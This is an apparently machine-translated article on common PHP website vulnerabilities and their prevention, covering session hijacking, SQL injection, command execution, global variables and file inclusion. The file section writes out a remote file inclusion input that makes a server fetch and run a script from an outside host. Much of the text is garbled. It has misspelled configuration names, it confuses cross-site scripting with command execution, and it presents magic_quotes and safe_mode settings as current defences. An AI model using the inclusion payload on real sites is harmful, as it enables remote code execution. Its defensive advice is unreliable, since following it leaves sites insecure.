Summary of common PHP website security vulnerabilities and corresponding preventive measures, and security vulnerability prevention measures. Summary of common security vulnerabilities and corresponding preventive measures of PHP websites. Currently, PHP-based website development has become the mainstream of website development, in this article, I will focus on the summary of common security vulnerabilities and corresponding preventive measures on the PH PHP website, as well as the security vulnerability prevention measures.
Currently, PHP-based website development has become the mainstream of website development. This article focuses on exploring PHP website attacks and security prevention to reduce website vulnerabilities and hope to help you!
I. common PHP website security vulnerabilities
There are currently five common PHP vulnerabilities. Session file vulnerabilities, SQL injection vulnerabilities, script command execution vulnerabilities, global variables vulnerabilities, and file vulnerabilities. These vulnerabilities are briefly described here.
1. session file vulnerability
Session attacks are one of the most common attack methods for hackers. When a user accesses a website, the Session and Cookie are set for PHP to facilitate user use and access, in order to avoid losing the account and password for each page of the user.
2. SQL Injection Vulnerability
During website development, the programmer lacks comprehensive judgment on user data or does not strictly filter the data, causing the server to execute malicious information, such as user information query. Hackers can obtain relevant information based on the results returned by malicious programs. This is the SQL injection vulnerability.
3. script execution vulnerability
The common cause of the script execution vulnerability is that the programmer rarely filters URL parameters submitted by users during Website Development. the URLs submitted by users may contain malicious code and cause cross-site scripting attacks. Script execution vulnerabilities often exist on previous PHP websites. However, with the upgrade of the PHP version, these questions have been reduced or do not exist.
4. global variable vulnerability
Variables in PHP do not need to be declared in advance when they are used as in other development languages. variables in PHP can be directly used without being declared and automatically created when used, the system automatically determines the variable type based on the context. This method can greatly reduce the probability of errors in programming, which is very convenient to use.
5. file vulnerabilities
File vulnerabilities are usually caused by a lack of adequate filtering of external data during Website design by website developers. as a result, hackers exploit the vulnerabilities to execute relevant commands on the Web process. Assume that. php contains the following code: include ($ B. "/aaa. php ".), for hackers, the variable $ B can be used to launch remote attacks. it can be the hacker's own code to launch attacks on the website. You can submit a. php include = http: // lz7.0.0.0.1/B. php to the server, and then execute the B. php command.
II. prevention measures for common PHP vulnerabilities
1. Session vulnerability prevention
According to the previous analysis, Session hijacking is the most common attack type, that is, the hacker obtains the user's Session ID through various attack methods, then, use the identity of the attacked user to log on to the corresponding website.
To prevent this problem, you can use the following methods:
First, change the Session ID periodically. you can use the built-in function of PHP to change the Session ID;
The second is to change the Session name. Normally, the default name of the Session is PHPSESSID. this variable is generally saved in the cookie. if the name is changed, this can block part of the hacker's attacks;
The third is to close the transparent Session ID. The so-called transparent means that Sessioin id is transmitted by link when the http request does not use cookies to specify the Session id. to disable transparent Session ID, you can operate PHP. the INI file is implemented. The fourth is to pass the hidden parameters through the URL. This ensures that even if the hacker obtains the session data, the Session ID variable value is hard to be obtained because the relevant parameters are hidden.
2. Prevention of SQL injection vulnerabilities
Hackers have many SQL injection methods and are flexible and changeable. However, the common cause of SQL injection is the use of the input filter vulnerability. Therefore, to fundamentally prevent SQL injection, the fundamental solution is to strengthen the filtering of request commands, especially query request commands.
Specifically, it includes the following:
First, filter statements are parameterized, that is, using parameterized statements to input user information rather than directly embedding user input into statements;
Second, use as few explanatory programs as possible during Website Development. hackers often use this method to execute illegal commands;
Third, avoid website bugs whenever possible During website development. otherwise, hackers may use this information to attack the website. it is not enough to defend against SQL injection alone, in addition, professional vulnerability scanning tools are often used to scan websites.
3. script execution vulnerability prevention
Attackers can exploit the scripting vulnerability to launch attacks in a variety of ways, which are flexible and changeable. Therefore, they must adopt a variety of preventive methods, in order to effectively prevent hackers from attacking the script execution vulnerability.
The following methods are commonly used:
First, set the path of the executable file in advance. It can be implemented through safe_moade_exec_dir;
The second is to process command parameters, which are generally implemented using the escapeshellarg function;
Third, use the built-in function library to replace external commands;
Fourth, the use of external commands may be reduced during operations.
4. global variable vulnerability prevention
For the global variable vulnerability in PHP, this problem exists in the previous PHP version. However, after the PHP version is upgraded to 5.5. set ruquest_order to GPC.
In addition, in the php. ini configuration file, you can set the boolean value of magic_quotes_runtime to determine whether to add a backslash to the overflow character in the externally appealing data.
In order to ensure that the website program can run in any setting status on the server. You can use get_magic_quotes_runtime at the beginning of the entire program to check the setting status to determine whether to manually handle the problem, or use set_magic_quotes_runtime (0) to disable it at the beginning (or when automatic escape is not required.
5. file vulnerability prevention
For PHP file leakage, you can set and configure the server for defense purposes.
The specific operations are as follows:
First, disable the error prompt in the PHP code to prevent hackers from obtaining the database information and the physical path of the webpage file through the error prompt;
Second, do your best to set open_basedir, that is, disable file operations outside the directory. This protects local or remote files from attacks, pay attention to the prevention of Session and upload file attacks;
The third is to set safe-made to enabled to standardize the commands to be executed. by prohibiting file upload, the security factor of the PHP website can be effectively improved.
Currently, PHP-based website development has become the mainstream of website development. the focus of this article is from PH...